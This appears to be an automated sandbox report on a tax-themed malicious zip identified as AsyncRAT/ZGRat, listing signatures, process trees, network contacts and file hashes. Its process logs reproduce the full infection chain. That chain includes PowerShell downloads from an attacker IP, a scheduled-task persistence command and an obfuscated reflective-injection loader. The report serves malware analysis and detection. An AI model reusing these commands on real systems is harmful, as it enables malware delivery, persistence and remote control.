Analysis Overview
SHA256
a0de57ddd8f03531fe83fa680a519d69616e04919cb0b30b2a1eac69124d6131
Threat Level: Known bad
The file Taxes-ConfidentiaI.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Detect ZGRat V1
ZGRat
Async RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 21:29
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win7-20231129-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 940 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2316 wrote to memory of 940 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2316 wrote to memory of 940 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2316 wrote to memory of 2720 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2316 wrote to memory of 2720 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2316 wrote to memory of 2720 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
Files
memory/940-7-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/940-8-0x0000000002630000-0x0000000002638000-memory.dmp
memory/940-9-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
memory/940-10-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/940-11-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
memory/940-12-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/940-13-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/940-14-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win10v2004-20231222-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1404 set thread context of 3540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
C:\Users\Public\Rar.exe
Rar.exe x -p111 load.rar
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.185.107.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.22.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.22.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | win0090.theworkpc.com | udp |
| NL | 91.92.250.202:5010 | win0090.theworkpc.com | tcp |
| NL | 91.92.250.202:6606 | win0090.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 202.250.92.91.in-addr.arpa | udp |
Files
memory/4996-3-0x000001E0B15C0000-0x000001E0B15E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0l41xdsu.00j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4996-13-0x00007FFF11210000-0x00007FFF11CD1000-memory.dmp
memory/4996-14-0x000001E0B15F0000-0x000001E0B1600000-memory.dmp
memory/4996-15-0x000001E0B15F0000-0x000001E0B1600000-memory.dmp
memory/4996-16-0x000001E0B38B0000-0x000001E0B38D6000-memory.dmp
memory/4996-17-0x000001E0B3910000-0x000001E0B3924000-memory.dmp
memory/4996-18-0x00007FFF11210000-0x00007FFF11CD1000-memory.dmp
C:\Users\Public\basta.js
| MD5 | acc80e9a87c6fa26564d11ba56eb1529 |
| SHA1 | bc7fd2c2afae4511618c540a827cd3263e4df4fb |
| SHA256 | f9f6b12f1afd646a4822f11eb2c84533c4afab06162c84dd184b20eae3f40ebe |
| SHA512 | caa4b016b9062a1b39d5e4981aa6104f1a10f3d0a855b83d2f6d6f49d1aa05f4e63b4f81ee3b7fb1009cb003478834e014d8807fa793820535c3cce03bfb6500 |
C:\Users\Public\node.bat
| MD5 | 15333bb0cc252086e87ad2aea347d684 |
| SHA1 | 303efa040dd58b5d27bd884bab31cabcd7030315 |
| SHA256 | 7db89368b3daa954c91364203c177d469fbc56d09b69acf71116b3f0eeffd657 |
| SHA512 | d7308fbeacbf4a1c807850aa19c888a79feeed023fcfa872751d7bc60ab8afb7d631bbb5d3819da3b5882ed642a30604451d9eed62927b87fb813c27c12a24db |
memory/3288-58-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
memory/3288-60-0x000001D927390000-0x000001D9273A0000-memory.dmp
memory/3288-59-0x000001D927390000-0x000001D9273A0000-memory.dmp
memory/3288-61-0x000001D929540000-0x000001D929566000-memory.dmp
memory/3288-63-0x000001D927390000-0x000001D9273A0000-memory.dmp
memory/3288-65-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 61e2e57471d559f5f6813c0a7995c075 |
| SHA1 | 33c621541bc0892ddab1b65345a348c14af566e5 |
| SHA256 | c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d |
| SHA512 | 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04006c0181f363c55382544eb4df8112 |
| SHA1 | 7c9ad1c480db78e041d5a7dadda95856b879e5f8 |
| SHA256 | a7a067683ca18d112ef4374975d42c1d2651fc98d017d4482bf38767f4dcfe4a |
| SHA512 | 5faf1b98dc806ed504453d5a8677be4f749c017fc019d45d90036d590b93d6865cb1dfb56f760852288c7c6f53c4796905b64ae81d9f21bb3ac14929220f9069 |
memory/2016-77-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
memory/2016-78-0x0000020CDEE40000-0x0000020CDEE50000-memory.dmp
memory/2016-79-0x0000020CDEE40000-0x0000020CDEE50000-memory.dmp
memory/2016-81-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | ea7771c6e2cd4c1e9b1f00f233764a8c |
| SHA1 | 69fc45ead32fe3749e6b1e2a6eaf6ade10e0379d |
| SHA256 | f2065f51a038146796411358d464c9e0a4ec2c5ba89d1157c588ac2175cb1122 |
| SHA512 | 32c88a76ce6cbaa15531138209a8b644f297264a0b7e3f79a2a0ae88e93793ba88eb95fc7e8cd52b884afa426a93ada3682425afba93098114622aa22d5b1ba1 |
memory/2004-96-0x000001F578C30000-0x000001F578C40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548021b135309743beece83b6d97f5b8 |
| SHA1 | 2e5cf64b1081e8d6c1dfff465c61ebe3542d1a85 |
| SHA256 | 180212e1f17e184d4e1768256ad99ff8f821e005ddb1bf5528e99e3fe243b42a |
| SHA512 | 1c3d9e049115fe2918c9a47b441f3eca0a8d61b0aaa511e5b5f3b822eb44d67478f543fe2e30ce456b5ffcdad58b9f0e10c16efdc35e35565c2d55d3755cba05 |
memory/2004-94-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
memory/2004-97-0x000001F578C30000-0x000001F578C40000-memory.dmp
C:\Users\Public\runpe.txt
| MD5 | 31039ac63ade7ad73164c47c38f5c46b |
| SHA1 | ca8cf58585aab7687c222cb49ab23a0f1862d8f1 |
| SHA256 | 897bdc409a1d254462d7df9dbb983d1d2a93722e70d7527d00f9156d9cada6ff |
| SHA512 | 7c9ce78b1191d88d6a3f368227713dbcd621061f60d3f6240fbe540d220859de2477b61f5131a69cfa03a529f1c4abe7010dc02217836e1abf0934bf003dbaad |
C:\Users\Public\msg.txt
| MD5 | 57ece7de9ff20214d5949a1a31114d06 |
| SHA1 | 046a95241bbd0dd825dd8738e5c6ccf5f887ba19 |
| SHA256 | c0f52718e1f62533b1e9fb6b4635f59023abe58ede410de7481cd4be6c20eb0f |
| SHA512 | 32004c2e1c748e1e46aa8da74634fe9510ee9d93a3a3d46bb65c9d8444579429706099e6ea42f8a95f9841652f850ecade0d8c3c9324057822b246793f300f6c |
C:\Users\Public\NewPE2.txt
| MD5 | 8a56a0e23dbfe7a50c5ec927b73ec5f2 |
| SHA1 | abebd513e68e63e7ec6ae56327c232b6e444ce0a |
| SHA256 | 3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1 |
| SHA512 | 276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2 |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
C:\Users\Public\Framework.txt
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
memory/2004-107-0x000001F57B2D0000-0x000001F57B322000-memory.dmp
C:\Users\Public\Execute.txt
| MD5 | 40cd014b7b6251e3a22e6a45a73a64e1 |
| SHA1 | 6ea36ce8d4940505e9a2c8fea5db868cd8b3d440 |
| SHA256 | e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1 |
| SHA512 | 776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea |
memory/2004-108-0x000001F578C30000-0x000001F578C40000-memory.dmp
memory/2004-109-0x00007FFF11220000-0x00007FFF11CE1000-memory.dmp
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1404-112-0x00007FFF11630000-0x00007FFF120F1000-memory.dmp
memory/1404-113-0x00000269DB640000-0x00000269DB650000-memory.dmp
memory/1404-114-0x00000269DB640000-0x00000269DB650000-memory.dmp
memory/1404-124-0x00000269DB640000-0x00000269DB650000-memory.dmp
memory/3540-125-0x0000000000400000-0x0000000000416000-memory.dmp
memory/1404-128-0x00007FFF11630000-0x00007FFF120F1000-memory.dmp
memory/3540-129-0x0000000074650000-0x0000000074E00000-memory.dmp
memory/3540-130-0x0000000005430000-0x0000000005440000-memory.dmp
memory/3540-131-0x0000000005B50000-0x00000000060F4000-memory.dmp
memory/3540-132-0x0000000005790000-0x0000000005822000-memory.dmp
memory/3540-133-0x0000000005780000-0x000000000578A000-memory.dmp
memory/3540-134-0x0000000005A70000-0x0000000005B0C000-memory.dmp
memory/3540-135-0x0000000006540000-0x00000000065A6000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win7-20231215-en
Max time kernel
118s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 860 wrote to memory of 2468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 860 wrote to memory of 2468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 860 wrote to memory of 2468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 860 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 860 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 860 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2O22-Tax-Returns.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
Files
memory/2468-7-0x000000001B660000-0x000000001B942000-memory.dmp
memory/2468-8-0x0000000002340000-0x0000000002348000-memory.dmp
memory/2468-9-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
memory/2468-10-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2468-11-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
memory/2468-13-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2468-12-0x00000000029C0000-0x0000000002A40000-memory.dmp
